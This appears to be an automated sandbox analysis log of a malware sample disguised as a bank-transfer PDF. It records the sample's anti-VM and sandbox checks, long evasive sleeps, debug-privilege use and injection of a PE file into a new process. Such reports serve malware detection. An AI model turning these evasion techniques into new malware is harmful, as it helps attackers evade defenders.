Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: transferencia bancaria.pdf.exe, 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: transferencia bancaria.pdf.exe, 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe TID: 2372	Thread sleep time: -42186s >= -30000s
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe TID: 6116	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe TID: 5156	Thread sleep time: -300000s >= -30000s

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Thread delayed: delay time: 42186
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Thread delayed: delay time: 60000

Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: transferencia bancaria.pdf.exe, 00000000.00000002.291185342.000000000445F000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.295985554.0000000007AA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: HoR6YLHHGFsobhrR7rF
Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Memory written: C:\Users\user\Desktop\transferencia bancaria.pdf.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Process created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Users\user\Desktop\transferencia bancaria.pdf.exe VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
